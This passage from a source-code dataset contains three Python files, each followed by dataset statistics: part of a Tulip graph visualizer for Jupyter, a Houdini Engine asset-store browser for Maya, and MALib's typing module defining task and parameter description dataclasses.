                    os.remove(dest)
            _install_nbextension(required_files)
    # URLs are relative to the notebook server root.
    prefix = '/nbextensions/tulipjs/'
    urls = {}
    urls['tulipjs'] = prefix + 'tulip.js'
    urls['base64utilsjs'] = prefix + 'base64utils.js'
    urls['jquerytoolbarjs'] = prefix + 'jquery.toolbar.min.js'
    urls['jquerytoolbarcss'] = prefix + 'css/jquery.toolbar.css'
    urls['fontawesomecss'] = prefix + 'css/font-awesome.min.css'
    return urls
def getGraphVisualizationHTML(graph):
    """Serialize *graph* to tlpb.gz, base64-embed it and render the
    HTML/CSS/JS snippet that displays it with tulip.js.

    :param graph: a tlp.Graph instance.
    :return: an HTML string ready for IPython rich display.
    """
    # Unique DOM id so several visualizations can coexist in one notebook.
    vizid = 'fig_el' + str(int(random.random() * 1E10))
    urls = copyNeededFilesToWebServer()
    dirpath = tempfile.mkdtemp()
    try:
        tmpGraphFile = os.path.join(dirpath, 'graph.tlpb.gz')
        tlp.saveGraph(graph, tmpGraphFile)
        # BUGFIX: close the file handle (it used to leak) and remove the
        # temporary directory even when saving/reading fails.
        with open(tmpGraphFile, 'rb') as f:
            tlpbgzGraphData = f.read()
    finally:
        shutil.rmtree(dirpath)
    # b64encode returns bytes on Python 3; the template needs text.
    if sys.version_info[0] == 3:
        tlpbgzGraphDataBase64 = str(base64.b64encode(tlpbgzGraphData), 'utf-8')
    else:
        tlpbgzGraphDataBase64 = base64.b64encode(tlpbgzGraphData)
    return TULIPJS_HTML.render(
        vizid=vizid,
        tulipjs_url=urls['tulipjs'],
        base64utils_url=urls['base64utilsjs'],
        jquerytoolbarjs_url=urls['jquerytoolbarjs'],
        jquerytoolbarcss_url=urls['jquerytoolbarcss'],
        fontawesomecss_url=urls['fontawesomecss'],
        tlpbgz_graph_base64=tlpbgzGraphDataBase64,
    )
def display(graph):
    """Display *graph* inline and register an HTML formatter so any
    tlp.Graph evaluated in a notebook cell renders as a tulip.js view."""
    ipythondisplay(graph)
    ip = get_ipython()
    formatter = ip.display_formatter.formatters['text/html']
    formatter.for_type(tlp.Graph, lambda graph: getGraphVisualizationHTML(graph))
| 33.413919 | 171 | 0.623986 | 965 | 9,122 | 5.835233 | 0.297409 | 0.00959 | 0.023619 | 0.012431 | 0.223229 | 0.127508 | 0.113124 | 0.064642 | 0.064642 | 0.064642 | 0 | 0.015782 | 0.215084 | 9,122 | 272 | 172 | 33.536765 | 0.77067 | 0.041986 | 0 | 0.17757 | 0 | 0.060748 | 0.679918 | 0.204376 | 0 | 0 | 0 | 0 | 0 | 1 | 0.018692 | false | 0 | 0.093458 | 0 | 0.121495 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
6e47902a10071cf7f3d6d93e2ed2545f7b79c7b3 | 9,396 | py | Python | houdini_engine_for_maya/asset_store.py | sonictk/HoudiniEngineForMaya | 0dd3609ae781a20b26219f87388f030c933273c6 | [
"MIT"
] | 86 | 2015-01-11T00:26:02.000Z | 2021-11-08T09:36:01.000Z | houdini_engine_for_maya/asset_store.py | sonictk/HoudiniEngineForMaya | 0dd3609ae781a20b26219f87388f030c933273c6 | [
"MIT"
] | 7 | 2015-04-16T14:44:35.000Z | 2017-09-01T18:55:01.000Z | houdini_engine_for_maya/asset_store.py | sonictk/HoudiniEngineForMaya | 0dd3609ae781a20b26219f87388f030c933273c6 | [
"MIT"
] | 46 | 2015-02-05T00:04:48.000Z | 2021-11-11T20:43:35.000Z | import json
import os
import re
import sys
import maya.cmds as cmds
import maya.mel as mel
current_user = None
asset_size = 100
child_entries_margin = 5
child_assets_column = 3
asset_store_window = "houdiniEngineAssetStoreWindow"
change_user_menu_item = "houdiniEngineAssetStoreChangeUserMenuItem"
asset_entries_scroll_layout = "houdiniEngineAssetStoreEntriesScrollLayout"
def get_store_path():
    """Return the root directory of the Houdini asset store.

    Honors the HOUDINI_ASSET_STORE_PATH environment variable; otherwise the
    path is derived from the Houdini version reported by the engine plugin
    and the platform-specific Houdini preferences directory.
    """
    override = os.environ.get("HOUDINI_ASSET_STORE_PATH")
    if override is not None:
        return override

    version_parts = cmds.houdiniEngine(houdiniVersion=True).split(".")
    major, minor = version_parts[0], version_parts[1]

    # Platform prefix -> Houdini preferences directory template.
    prefs_templates = (
        ("linux", "~/houdini{0}.{1}"),
        ("win32", "~/houdini{0}.{1}"),
        ("darwin", "~/Library/Preferences/houdini/{0}.{1}"),
    )
    for platform_prefix, template in prefs_templates:
        if sys.platform.startswith(platform_prefix):
            prefs_dir = os.path.expanduser(template.format(major, minor))
            return os.path.join(prefs_dir, "asset_store")

    raise Exception("Cannot determine asset store path. Unknown OS.")
def get_store_user_path():
    """Return the per-user subdirectory of the asset store.

    Falls back to the "default" directory when the current user is unknown
    or has no directory mapping in users.json.
    """
    current = get_store_current_user()
    users_root = get_users()

    directory = None
    if users_root:
        directory = users_root["users"].get(current)
    if not directory:
        directory = "default"
    return os.path.join(get_store_path(), directory)
def get_store_users_path():
    # users.json maps user names to their store sub-directories.
    return os.path.join(get_store_path(), "users.json")

def get_store_installed_assets_path():
    # Per-user manifest of installed assets.
    return os.path.join(get_store_user_path(), "installed_assets.json")

def get_store_otls_path():
    # Per-user directory holding the asset .otl/.hda library files.
    return os.path.join(get_store_user_path(), "otls")

def get_store_icons_path():
    # Per-user directory holding asset icons.
    return os.path.join(get_store_user_path(), "icons")

def get_store_licenses_path():
    # Per-user directory holding per-asset license .json files.
    return os.path.join(get_store_user_path(), "licenses")
def get_store_current_user():
    """Return the active asset-store user, lazily resolved from users.json.

    The value is cached in the module-level `current_user` global and is
    initialised from the store's "default_user" entry on first call.
    """
    global current_user
    if not current_user:
        users_root = get_users()
        if users_root and "default_user" in users_root:
            current_user = users_root["default_user"]
        if not current_user:
            # Python 2 print statement (this module targets Maya's py2).
            print "Warning: Cannot determine default user for asset store."
    return current_user
def get_users():
    """Parse users.json and return its root object, or None if absent."""
    path = get_store_users_path()
    if os.path.exists(path):
        with open(path, "r") as handle:
            return json.load(handle)
    return None
def get_installed_assets():
    """Parse the per-user installed_assets.json manifest.

    Returns the manifest's root object, or None when the file is absent.
    """
    path = get_store_installed_assets_path()
    if os.path.exists(path):
        with open(path, "r") as handle:
            return json.load(handle)
    return None
def get_asset_license(otl_file):
    """Load the license metadata for an installed asset.

    The license file shares the asset's basename, with the Houdini library
    extension (.otl/.hda and their lc/nc variants) replaced by .json.
    """
    extension_pattern = "\\.otl$|\\.hda$|\\.otllc$|\\.hdalc$|\\.otlnc$|\\.hdanc$"
    json_name = re.sub(extension_pattern, ".json", otl_file)
    json_path = os.path.join(get_store_licenses_path(), json_name)
    with open(json_path, "r") as handle:
        return json.load(handle)
def load_asset(otl_file, asset):
    # Thin wrapper: load *asset* (full node type name) from *otl_file* into
    # the current Maya scene via the Houdini Engine plugin.
    cmds.houdiniAsset(loadAsset=[otl_file, asset])
def create_asset_entry(asset):
    """Build one square UI cell for *asset* inside the current grid layout.

    Installed assets (with an "otl_file") get a clickable icon button that
    loads them; assets flagged "update_available" get a non-clickable icon
    plus an explanatory label.  The asset name is overlaid at the bottom.
    """
    form_layout = cmds.formLayout(width = asset_size, height = asset_size)
    if "otl_file" in asset:
        license = get_asset_license(asset["otl_file"])
        otl_file = os.path.join(get_store_otls_path(), asset["otl_file"])
        # Rewrite "scope::name" into "scope::category/name" so the correct
        # node type is loaded from the library.
        m = re.match("([^:]*)::(.*)", asset["node_type_name"])
        asset_name = "{0}::{1}/{2}".format(
            m.group(1),
            license["category_name"],
            m.group(2),
        )
        cmds.symbolButton(
            annotation = asset["descriptive_name"],
            image = os.path.join(get_store_icons_path(), asset["icon"]),
            width = asset_size, height = asset_size,
            # *args swallows whatever argument(s) Maya passes to the
            # button callback; otl_file/asset_name are captured per entry.
            command = lambda *args: load_asset(otl_file, asset_name)
        )
    elif "update_available" in asset and asset["update_available"]:
        # Updates must be applied from Houdini; show a disabled-looking cell.
        cmds.symbolButton(
            annotation = asset["descriptive_name"],
            image = os.path.join(get_store_icons_path(), asset["icon"]),
            width = asset_size, height = asset_size,
        )
        cmds.text(
            label = "Update available. Use Houdini to update asset.",
            width = asset_size, height = asset_size,
            wordWrap = True,
        )
    # Name overlay pinned to the bottom of the cell.
    text = cmds.text(
        label = asset["descriptive_name"],
        backgroundColor = [0,0,0],
        align = "right",
    )
    cmds.formLayout(
        form_layout,
        edit = True,
        width = asset_size, height = asset_size,
        attachForm = [[text, "left", 0], [text, "right", 0], [text, "bottom", 0]],
    )
    cmds.setParent(upLevel = True)
def compare_asset_entry(x, y):
    """cmp-style comparator for store entries: assets sort before folders,
    folders sort alphabetically by name.

    Returns a negative/zero/positive integer as required by a comparator
    (this module passes it to Python 2's ``sorted(..., cmp=...)``).

    Fixes over the previous version:
    * two assets now compare equal (it used to return -1 for both
      cmp(a, b) and cmp(b, a), violating antisymmetry and making the sort
      order undefined);
    * equal-named folders compare equal instead of arbitrarily returning 1;
    * any other type combination falls through to 0 instead of None.
    """
    x_is_folder = x["type"] == "folder"
    y_is_folder = y["type"] == "folder"
    if x_is_folder and y_is_folder:
        if x["name"] < y["name"]:
            return -1
        if x["name"] > y["name"]:
            return 1
        return 0
    if x_is_folder and not y_is_folder:
        return 1
    if y_is_folder and not x_is_folder:
        return -1
    return 0
def create_asset_entries(entries):
    """Recursively build the UI for a list of store entries.

    Folders become collapsible frames (recursing into their children);
    consecutive assets are grouped into a shared grid layout.  Entries are
    ordered assets-first, folders alphabetically (see compare_asset_entry).
    NOTE(review): `sorted(..., cmp=...)` is Python 2 only.
    """
    in_assets_layout = False
    cmds.columnLayout(adjustableColumn = True)
    for entry in sorted(entries, cmp = compare_asset_entry):
        if entry["type"] == "folder":
            # Close any open asset grid before starting a folder frame.
            if in_assets_layout:
                in_assets_layout = False
                cmds.setParent(upLevel=True)
            cmds.frameLayout(
                collapsable = True,
                label = entry["name"],
                marginWidth = child_entries_margin
            )
            create_asset_entries(entry["entries"])
            cmds.setParent(upLevel = True)
        elif entry["type"] == "asset":
            # Lazily open a grid the first time an asset is seen in a run.
            if not in_assets_layout:
                in_assets_layout = True
                cmds.gridLayout(
                    numberOfColumns = child_assets_column,
                    cellWidthHeight = [asset_size, asset_size]
                )
            create_asset_entry(entry)
    # Close a trailing asset grid, then the column layout itself.
    if in_assets_layout:
        in_assets_layout = False
        cmds.setParent(upLevel = True)
    cmds.setParent(upLevel = True)
def change_user(user):
    """Switch the active asset-store user and rebuild the asset list.

    BUGFIX: the previous version assigned to a *local* ``current_user``,
    which silently had no effect; the module-level global must be rebound
    so get_store_current_user() picks up the new user.
    """
    global current_user
    current_user = user
    refresh_asset_entries()
def change_user_post_menu_command(*args):
    """Rebuild the "Change User" submenu each time it is opened, listing
    every user from users.json with the active one radio-checked."""
    cmds.menu(
        change_user_menu_item,
        edit = True,
        deleteAllItems = True,
    )
    cmds.setParent(change_user_menu_item, menu = True)
    users_root = get_users()
    if not users_root:
        return
    current_user = get_store_current_user()
    for user in users_root["users"]:
        cmds.menuItem(
            label = user,
            # user=user binds the loop variable early (avoids the
            # late-binding closure pitfall).
            # NOTE(review): if Maya invokes menuItem commands with a
            # positional argument it would override the `user` default --
            # verify, and swallow extras with a leading parameter if so.
            command = lambda user=user: change_user(user),
            radioButton = user == current_user
        )
def refresh_asset_entries(*args):
    """Rebuild the scrollable asset list inside the asset store window."""
    if not cmds.window(asset_store_window, exists = True):
        return
    cmds.setParent(asset_store_window)
    # Delete the existing layout
    if cmds.scrollLayout(asset_entries_scroll_layout, exists = True):
        cmds.deleteUI(asset_entries_scroll_layout)
    installed_assets = get_installed_assets()
    cmds.scrollLayout(asset_entries_scroll_layout, childResizable = True)
    if installed_assets \
            and installed_assets["organization"]["entries"]:
        create_asset_entries(installed_assets["organization"]["entries"])
    else:
        # No manifest (or an empty one): show a link to the store instead.
        cmds.text(
            label = "There are no Orbolt assets installed for this user.<br />"
                "Please visit the <a href=\"http://www.orbolt.com/maya\">Orbolt Store</a> for assets.",
            wordWrap = True,
            hyperlink = True,
        )
    cmds.setParent(upLevel = True)
def close_asset_store_window(*args):
    """Destroy the asset store window (menu "Close" callback)."""
    cmds.deleteUI(asset_store_window)

def show_asset_store_window():
    """Create (or simply raise, if it already exists) the Orbolt Asset
    Browser window, build its File menu, and populate the asset list."""
    if cmds.window(asset_store_window, exists = True):
        cmds.showWindow(asset_store_window)
        return
    cmds.window(
        asset_store_window,
        title = "Orbolt Asset Browser",
        menuBar = True,
    )
    cmds.menu(label = "File", tearOff = True)
    cmds.menuItem(
        change_user_menu_item,
        label = "Change User",
        subMenu = True,
        # Submenu contents are rebuilt on demand from users.json.
        postMenuCommand = change_user_post_menu_command,
    )
    cmds.setParent(menu = True, upLevel = True);
    cmds.menuItem(divider = True)
    cmds.menuItem(label = "Refresh Asset List", command = refresh_asset_entries)
    cmds.menuItem(divider = True)
    cmds.menuItem(label = "Close", command = close_asset_store_window)
    cmds.setParent(menu = True, upLevel = True);
    refresh_asset_entries()
    cmds.showWindow(asset_store_window)
| 29.54717 | 103 | 0.60845 | 1,096 | 9,396 | 4.943431 | 0.17062 | 0.032484 | 0.032484 | 0.023994 | 0.3732 | 0.280362 | 0.188446 | 0.149317 | 0.149317 | 0.112034 | 0 | 0.005213 | 0.285441 | 9,396 | 317 | 104 | 29.640379 | 0.801758 | 0.005747 | 0 | 0.274262 | 0 | 0 | 0.114252 | 0.029232 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.025316 | null | null | 0.004219 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
6e4a036e76c60a887c51d8589ef8cb77edd3715f | 14,051 | py | Python | malib/utils/typing.py | zbzhu99/malib | 5be07ac00761a34fb095adb2b3018a798ceea256 | [
"MIT"
] | null | null | null | malib/utils/typing.py | zbzhu99/malib | 5be07ac00761a34fb095adb2b3018a798ceea256 | [
"MIT"
] | null | null | null | malib/utils/typing.py | zbzhu99/malib | 5be07ac00761a34fb095adb2b3018a798ceea256 | [
"MIT"
] | null | null | null | import enum
import time
from collections import namedtuple
from dataclasses import dataclass, field
from typing import List, Dict, Any, Union, Tuple, Sequence, Callable, Optional
import gym
import numpy as np
from malib.utils.notations import deprecated
""" Rename and definition of basic data types which are correspond to the inputs (args, kwargs) """
PolicyConfig = Dict[str, Any]
MetaPolicyConfig = Tuple[gym.spaces.Space, gym.spaces.Space, Sequence[PolicyConfig]]
EnvConfig = Dict[str, Any]
RolloutConfig = Dict[str, Any]
ParameterLibConfig = Dict[str, Any]
DatasetConfig = Dict[str, Any]
TrainingConfig = Dict[str, Any]
ModelConfig = Dict[str, Any]
AgentConfig = Dict[str, TrainingConfig]
AgentID = str
PolicyID = str
EnvID = str
EpisodeID = str
DataBlockID = str
DataTransferType = np.ndarray
EnvObservationType = Any
# next_observation, rewards, done, infos
StandardEnvReturns = Tuple[
Dict[str, DataTransferType],
Dict[str, float],
Dict[str, bool],
Dict[str, Any],
]
# TODO(ming): mute info temporally to avoid data transferring errors
StandardTransition = namedtuple(
# "StandardTransition", "obs, new_obs, action, reward, done, info"
"StandardTransition",
"obs, new_obs, actions, rewards, dones",
)
ObservationSpaceType = gym.spaces.Space
ActionSpaceType = gym.spaces.Space
""" For task categorical and status tagging """
class TaskType(enum.Enum):
    """Enumerates every task category exchanged between the coordinator and
    the training/rollout/evaluation workers."""

    ASYNC_LEARNING = "async_learning"
    ADD_WORKER = "add_worker"
    SAVE_MODEL = "save_model"
    LOAD_MODEL = "load_model"
    OPTIMIZE = "optimization"
    ROLLOUT = "rollout"
    # NOTE(review): value casing is inconsistent with the other members;
    # anything matching on .value needs this exact string, so it is left
    # unchanged here.
    UPDATE_PARAMETER = "update_PARAMETER"
    PULL_PARAMETER = "pull_parameter"
    PUSH_PARAMETER = "push_parameter"
    SAMPLE_BATCH = "sample_batch"
    PUSH_SAMPLES = "push_samples"
    NO = "no"
    TRAINING_EVALUATE = "evaluate_for_training"
    ROLLOUT_EVALUATE = "evaluate_for_rollouts"
    ADD_POLICY = "add_policy"
    UPDATE_POPULATION = "update_population"
    EVALUATE = "evaluate"
    EVALUATE_WRITE_BACK = "evaluate_write_back"
    INIT = "initialization"
    CHECK_ADD = "check_add"
    TERMINATE = "terminate"
    SIMULATION = "simulation"
    UPDATE_PAYOFFTABLE = "update_payofftable"
class Status(enum.Enum):
    """Lifecycle/result states reported by workers and task handlers."""

    TERMINATE = "terminate"
    NORMAL = "normal"
    LOCKED = "locked"
    WAITING = "waiting"
    SUCCESS = "success"
    IDLE = "idle"
    IN_PROGRESS = "in progress"
    EXCEED = "exceed"
    FAILED = "failed"

class Paradigm(enum.Enum):
    """Top-level training paradigm: plain MARL vs meta-game (PSRO-style)."""

    MARL = "marl"
    META_GAME = "meta_game"
class BehaviorMode(enum.IntEnum):
    """Behavior mode, indicates environment agent behavior"""

    EXPLORATION = 0
    """Trigger exploration mode"""

    EXPLOITATION = 1
    """Trigger exploitation mode"""

class MetricType:
    """String keys used when reporting rollout metrics."""

    REWARD = "reward"
    """Reward"""

    LIVE_STEP = "live_step"
    """Agent live step"""

    REACH_MAX_STEP = "reach_max_step"
    """Whether reach max step or not"""

# Opaque parameter payload (e.g. network weights); no structural constraint.
Parameter = Any

""" Description: """
@dataclass
class ParameterDescription:
    """Describes one parameter (or gradient) payload exchanged through the
    parameter server."""

    class Type:
        # Payload kinds carried in the `type` field.
        PARAMETER = "parameter"
        GRADIENT = "gradient"

    time_stamp: float
    identify: str  # meta policy id
    env_id: str
    id: PolicyID
    type: str = Type.PARAMETER
    lock: bool = False
    description: Any = None
    data: Parameter = None
    parallel_num: int = 1
    version: int = -1

    @classmethod
    def gen_template(cls, **kwargs):
        # Build a filled-in template instance for tests/smoke checks; most
        # fields can be overridden through kwargs.
        return cls(
            time_stamp=time.time(),
            identify=kwargs.get("identify", None),
            id=kwargs["id"],
            lock=kwargs.get("lock", True),
            env_id=kwargs.get("env_id", "test"),
            type=kwargs.get("type", cls.Type.PARAMETER),
            data=kwargs.get("data", None),
            description=kwargs.get(
                "description",
                {
                    "registered_name": "test",
                    "observation_space": None,
                    "action_space": None,
                    "model_config": {},
                    "custom_config": {},
                },
            ),
        )
@dataclass
class MetaParameterDescription:
    """Bundle of :class:`ParameterDescription` entries belonging to one
    meta policy.

    :param meta_pid: meta policy id this bundle belongs to.
    :param parameter_desc_dict: mapping from policy id to its parameter
        description.
    :param timestamp: creation time of the instance.
    :param identify: identifier, rewritten in ``__post_init__`` to embed
        the meta policy id and the timestamp.
    """

    meta_pid: PolicyID
    parameter_desc_dict: Dict[PolicyID, ParameterDescription]
    # BUGFIX: the previous default `time.time()` was evaluated once at class
    # definition (import) time, so every instance shared the same stale
    # timestamp; default_factory evaluates per instance.
    timestamp: float = field(default_factory=time.time)
    identify: str = "MetaParameterDescription"  # meta policy id

    def __post_init__(self):
        # Make the identifier unique per meta policy and creation time.
        self.identify = f"{self.identify}_mpid_{self.meta_pid}_{self.timestamp}"

    @classmethod
    def gen_template(cls, **kwargs):
        """Build a template instance for tests/smoke checks.

        Expects ``meta_pid`` and an iterable ``pids`` in *kwargs*.
        """
        return cls(
            meta_pid=kwargs["meta_pid"],
            parameter_desc_dict={
                k: ParameterDescription.gen_template(id=k) for k in kwargs["pids"]
            },
        )
@dataclass
class BufferDescription:
    """Describes a (batched) read/write request against the offline dataset
    server for one or more agents."""

    env_id: str
    agent_id: Union[AgentID, List[AgentID]]
    policy_id: Union[PolicyID, List[PolicyID]]
    batch_size: int = 0
    sample_mode: str = ""
    indices: List[int] = None
    data: Any = None
    data_shapes: Dict[str, Tuple] = None
    sample_start_size: int = 0
    capacity: int = 1000
    identify: str = None

    def __post_init__(self):
        # Default identifier: sorted agent ids joined by underscores.
        if self.identify is None:
            self.identify = "_".join(sorted(self.agent_id))

    def __str__(self):
        # NOTE(review): the closing ">" is missing from the format string;
        # left as-is since downstream log parsing may match this output.
        return "<BufferDescription: agent_id={} policy_id={}".format(
            self.agent_id, self.policy_id
        )
@dataclass
class AgentInvolveInfo:
    """`AgentInvolveInfo` describes the trainable pairs, populations, environment id and the
    meta parameter descriptions.
    """

    training_handler: str
    trainable_pairs: Dict[AgentID, Tuple[PolicyID, PolicyConfig]]
    """ describe the environment agent id and their binding policy configuration """

    populations: Dict[AgentID, Sequence[Tuple[PolicyID, PolicyConfig]]]
    """ describe the policy population of agents """

    env_id: Optional[str] = None
    """ environment id """

    meta_parameter_desc_dict: Dict[AgentID, MetaParameterDescription] = None
    """ meta parameter description """

    @classmethod
    def gen_template(
        cls,
        agent_ids: List[AgentID],
        observation_space: gym.Space,
        action_space: gym.Space,
    ):
        # Build a template instance where every agent shares one example
        # (policy id, policy config) pair; used by tests/smoke checks.
        example_ptup = (
            "policy_0",
            {
                "registered_name": "test",
                "observation_space": observation_space,
                "action_space": action_space,
                "mode_config": None,
                "custom_config": None,
            },
        )
        return cls(
            training_handler="test",
            trainable_pairs=dict.fromkeys(agent_ids, example_ptup),
            populations=dict.fromkeys(agent_ids, [example_ptup]),
            env_id="test",
            meta_parameter_desc_dict=dict.fromkeys(
                agent_ids,
                MetaParameterDescription.gen_template(meta_pid=None, pids=["policy_0"]),
            ),
        )
@dataclass
class TrainingDescription:
    """Describes a training task dispatched to the training workers.

    ``gen_template`` is intentionally unimplemented for this task type.
    """

    agent_involve_info: AgentInvolveInfo
    stopper: str = "none"
    stopper_config: Dict[str, Any] = field(default_factory=dict)
    policy_distribution: Dict[AgentID, Dict[PolicyID, float]] = None
    update_interval: int = 1
    batch_size: int = 64
    mode: str = "step"  # update granularity; presumably "step" vs episode -- confirm
    # BUGFIX: `time.time()` used to be evaluated once at import time, so all
    # instances shared one stale timestamp; default_factory stamps each
    # instance at creation.
    time_stamp: float = field(default_factory=time.time)

    @classmethod
    def gen_template(cls, **template_attr_kwargs):
        raise NotImplementedError
@dataclass
class RolloutDescription:
    """Describes a rollout (data collection) task."""

    agent_involve_info: AgentInvolveInfo
    fragment_length: int
    num_episodes: int
    episode_seg: int
    terminate_mode: str
    mode: str  # on_policy or off_policy or imitation learning ?
    # parameter_desc_seq: Sequence[MetaParameterDescription] = None
    callback: Union[str, Callable] = "sequential"
    stopper: str = "none"
    stopper_config: Dict[str, Any] = field(default_factory=dict)
    policy_distribution: Dict[AgentID, Dict[PolicyID, float]] = None
    # BUGFIX: was `time.time()`, evaluated once at import time and shared by
    # every instance; default_factory stamps each instance at creation.
    time_stamp: float = field(default_factory=time.time)

    @classmethod
    def gen_template(cls, **template_attr_kwargs):
        """Build a template instance.

        Pops the nested "agent_involve_info" kwargs to build the involve
        info, then restores them so the caller's dict is left intact.
        """
        agent_involve_info_kwargs = template_attr_kwargs.pop("agent_involve_info")
        instance = cls(
            agent_involve_info=AgentInvolveInfo.gen_template(
                **agent_involve_info_kwargs
            ),
            policy_distribution=dict.fromkeys(
                agent_involve_info_kwargs["agent_ids"], {"policy_0": 1.0}
            ),
            **template_attr_kwargs,
        )
        template_attr_kwargs["agent_involve_info"] = agent_involve_info_kwargs
        return instance
@dataclass
class SimulationDescription:
    """Describes a simulation task: evaluate the given policy combinations
    against each other for a number of episodes."""

    agent_involve_info: AgentInvolveInfo
    policy_combinations: List[Dict[AgentID, Tuple[PolicyID, PolicyConfig]]]
    num_episodes: int
    callback: Union[str, Callable] = "sequential"
    max_episode_length: int = None
    # BUGFIX: was `time.time()`, evaluated once at import time and shared by
    # every instance; default_factory stamps each instance at creation.
    time_stamp: float = field(default_factory=time.time)

    @classmethod
    def gen_template(cls, **kwargs):
        """Build a template instance; pops/restores the nested
        "agent_involve_info" kwargs so the caller's dict is left intact."""
        agent_involve_template_attrs = kwargs.pop("agent_involve_info")
        instance = cls(
            agent_involve_info=AgentInvolveInfo.gen_template(
                **agent_involve_template_attrs
            ),
            **kwargs,
        )
        kwargs["agent_involve_info"] = agent_involve_template_attrs
        return instance
@dataclass
class TrainingFeedback:
    """Feedback produced by a training task: the involved agents plus the
    training statistics keyed by agent id."""

    agent_involve_info: AgentInvolveInfo
    statistics: Dict[AgentID, Any]
@dataclass
class RolloutFeedback:
    """RolloutFeedback for rollout tasks"""

    worker_idx: str
    """id of rollout worker"""

    agent_involve_info: AgentInvolveInfo
    """agent involve info describes the ..."""

    statistics: Dict[str, Any]
    policy_combination: Dict[PolicyID, PolicyID] = None

    def __post_init__(self):
        # Currently a no-op; the disabled code below used to flatten
        # MetricEntry values into plain numbers.
        pass
        # for res in self.statistics.values():
        #     for k, v in res.items():
        #         if isinstance(v, MetricEntry):
        #             res[k] = v.value
@deprecated
@dataclass
class EvaluationFeedback:
    """Deprecated: feedback of an evaluation task -- per-policy statistics
    for a given policy combination."""

    # env_id: str
    agent_involve_info: AgentInvolveInfo
    statistics: Dict[PolicyID, Dict[str, Any]]
    policy_combination: Dict[PolicyID, Tuple[PolicyID, PolicyConfig]]
@dataclass
class TaskDescription:
    """TaskDescription is a general description of
    Training, Rollout and Simulation tasks.
    """

    task_type: TaskType
    """task type used to identify which task description will be used"""

    content: Union[TrainingDescription, RolloutDescription, SimulationDescription]
    """content is a detailed task description entity"""

    state_id: Any
    timestamp: float = None
    source_task_id: str = None
    identify: str = None

    def __post_init__(self):
        # Stamp creation time and derive a readable, unique identifier.
        now = time.time()
        self.timestamp = now
        prefix_by_type = {
            TaskType.OPTIMIZE: "TrainingDescription",
            TaskType.ROLLOUT: "RolloutDescription",
            TaskType.SIMULATION: "SimulationDescription",
        }
        prefix = prefix_by_type.get(self.task_type, "UnknowDescription")
        self.identify = f"{prefix}_{now}"

    @classmethod
    def gen_template(cls, **template_attr_kwargs):
        """Build a template TaskDescription whose content is generated by
        the matching description class's own gen_template."""
        content_cls_by_type = {
            TaskType.OPTIMIZE: TrainingDescription,
            TaskType.ROLLOUT: RolloutDescription,
            TaskType.SIMULATION: SimulationDescription,
        }
        task_type = template_attr_kwargs["task_type"]
        if task_type not in content_cls_by_type:
            raise ValueError("Unknow task type: {}".format(task_type))
        desc_cls = content_cls_by_type[task_type]
        # Pop the nested content kwargs, build, then restore the caller's dict.
        content_template_attr_kwargs = template_attr_kwargs.pop("content")
        instance = cls(
            content=desc_cls.gen_template(**content_template_attr_kwargs),
            **template_attr_kwargs,
        )
        template_attr_kwargs["content"] = content_template_attr_kwargs
        return instance
@dataclass
class TaskRequest:
    """TaskRequest carries a handler's feedback and asks the coordinator
    for the next task."""

    task_type: TaskType
    """defines the requested task type"""

    content: Any
    """content is the feedback of current handler which request for next task"""

    state_id: str
    timestamp: Optional[float] = None  # set in __post_init__ via time.time()
    identify: Optional[str] = None  # derived from timestamp in __post_init__
    computing_mode: str = "bulk_sync"  # bulk_sync, async

    def __post_init__(self):
        # NOTE(review): `assert` is stripped under `python -O`; callers
        # should not rely on it for validation.
        assert self.state_id, "State id cannot be None"
        timestamp = time.time()
        self.timestamp = timestamp
        self.identify = f"TaskRequest_{timestamp}"

    @staticmethod
    def from_task_desc(task_desc: TaskDescription, **kwargs) -> "TaskRequest":
        # Derive a TaskRequest from an existing TaskDescription, with any
        # field overridable through kwargs.
        return TaskRequest(
            task_type=kwargs.get("task_type", task_desc.task_type),
            content=kwargs.get("content", task_desc.content),
            state_id=kwargs.get("state_id", task_desc.state_id),
            timestamp=kwargs.get("timestamp", None),
            identify=kwargs.get("identify", None),
        )
class BColors:
    """ANSI terminal escape codes for colored/emphasized console output."""

    HEADER = "\033[95m"
    OKBLUE = "\033[94m"
    OKCYAN = "\033[96m"
    OKGREEN = "\033[92m"
    WARNING = "\033[93m"
    FAIL = "\033[91m"
    ENDC = "\033[0m"  # reset all attributes
    BOLD = "\033[1m"
    UNDERLINE = "\033[4m"
class EvaluateResult:
    """String keys (and defaults) for evaluation results."""

    CONVERGED = "converged"
    AVE_REWARD = "average_reward"
    REACHED_MAX_ITERATION = "reached_max_iteration"

    @staticmethod
    def default_result():
        """Return a fresh result dict with all keys at their defaults."""
        defaults = {
            EvaluateResult.CONVERGED: False,
            EvaluateResult.AVE_REWARD: float("-inf"),
            EvaluateResult.REACHED_MAX_ITERATION: False,
        }
        return defaults
class TrainingMetric:
    """Names of metrics reported during training."""

    LOSS = "loss"
@dataclass
class BatchMetaInfo:
    """Metadata attached to a batch of collected episode data."""

    episode_id: str               # identifier of the episode the batch came from
    created_time: float           # time at which the batch was created
    meta_policy_id: str = None    # optional meta-policy identifier
    policy_id: str = None         # optional policy identifier
    env_id: Any = None            # optional environment identifier
    policy_type: Any = None       # optional policy type tag
class ExperimentManagerTableName:
    """Default field values used when addressing experiment-manager tables."""

    primary: str = ""    # primary table name
    secondary: str = ""  # secondary table name
    tag: str = ""        # free-form tag
    key: int = 0         # numeric key
    nid: int = 0         # numeric id
class EventReportStatus:
    """Markers for the beginning and end of a reported event."""

    START = "start"
    END = "end"
# TODO(jing): add docs for MetricEntry
class MetricEntry:
def __init__(self, value: Any, agg: str = "mean", tag: str = "", log: bool = True):
self.value = value
self.agg = agg
self.tag = tag
self.log = log
def cleaned_data(self):
"""Return values"""
